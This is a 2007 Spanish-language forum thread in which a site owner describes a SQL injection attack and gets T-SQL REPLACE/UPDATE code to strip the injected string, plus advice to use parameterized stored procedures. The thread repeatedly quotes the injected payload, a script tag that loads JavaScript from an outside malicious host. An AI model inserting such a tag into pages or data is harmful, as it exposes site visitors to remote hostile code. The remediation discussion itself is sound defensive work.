SQL Injection

09/11/2007 - 00:37 por Juan Linares | Informe spam
Hola expertos (y no tan expertos )
En dias pasados fuimos victimas de SQL injection y a los campos q admiten
texto les insertaron el string: <script src="http://yl18.net/0.js"></script>
se los dejo para q esten alertas, no les vaya a suceder lo mismo.

Entonces en los campos q daño no borro el contenido del mismo, el string se
inserto al final del contenido del campo.
Ahora quiero hacer la inversa para borrar dicha cadena sin perder los datos
q tengo capturados.

Hay algun tip q me puedan dar para crear un script q me permita hacer esto ?

Desde ya mi agradecimiento y ponganse listos porque googleando encontre q el
famoso yl18 ha fastidiado a mas webs, el archivo js invoca a sitos porno, no
sea q se vaya a contagiar. Yo tengo sql y asp

Saludos
 

Leer las respuestas

#1 Salvador Ramos
09/11/2007 - 13:59 | Informe spam
Hola,

Para eliminar esa subcadena, puedes utilizar la función REPLACE y lanzar un
update reemplazando esa subcadena por una cadena '' (son dos comillas
simples). Te paso un ejemplo de uso:
declare @c1 varchar(100)
select @c1 = '1234567890<script src="http://yl18.net/0.js"></script>'
select @c1 = replace(@c1, '<script src="http://yl18.net/0.js"></script>',
'')
print @c1

Por tanto puedes hacer un update:
update TuTabla
set TuCampo = replace(TuCampo, '<script
src="http://yl18.net/0.js"></script>', '')

De todas formas, lo principal es que tomes medidas apropiadas para evitar el
SQL injection. Te recomiendo, a parte de lo que puedas leer en muchísimos
artículos que hay sobre el tema, que utilices procedimientos almacenados con
sus correspondientes parámetros.

Un saludo
Salvador Ramos

www.helpdna.net (información sobre SQL Server y Microsoft .Net)
www.helpdna.net/acerca_de_salvador_ramos.htm


"Juan Linares" escribió en el mensaje
news:
Hola expertos (y no tan expertos )
En dias pasados fuimos victimas de SQL injection y a los campos q admiten
texto les insertaron el string: <script
src="http://yl18.net/0.js"></script> se los dejo para q esten alertas, no
les vaya a suceder lo mismo.

Entonces en los campos q daño no borro el contenido del mismo, el string
se inserto al final del contenido del campo.
Ahora quiero hacer la inversa para borrar dicha cadena sin perder los
datos q tengo capturados.

Hay algun tip q me puedan dar para crear un script q me permita hacer esto
?

Desde ya mi agradecimiento y ponganse listos porque googleando encontre q
el famoso yl18 ha fastidiado a mas webs, el archivo js invoca a sitos
porno, no sea q se vaya a contagiar. Yo tengo sql y asp

Saludos


Preguntas similares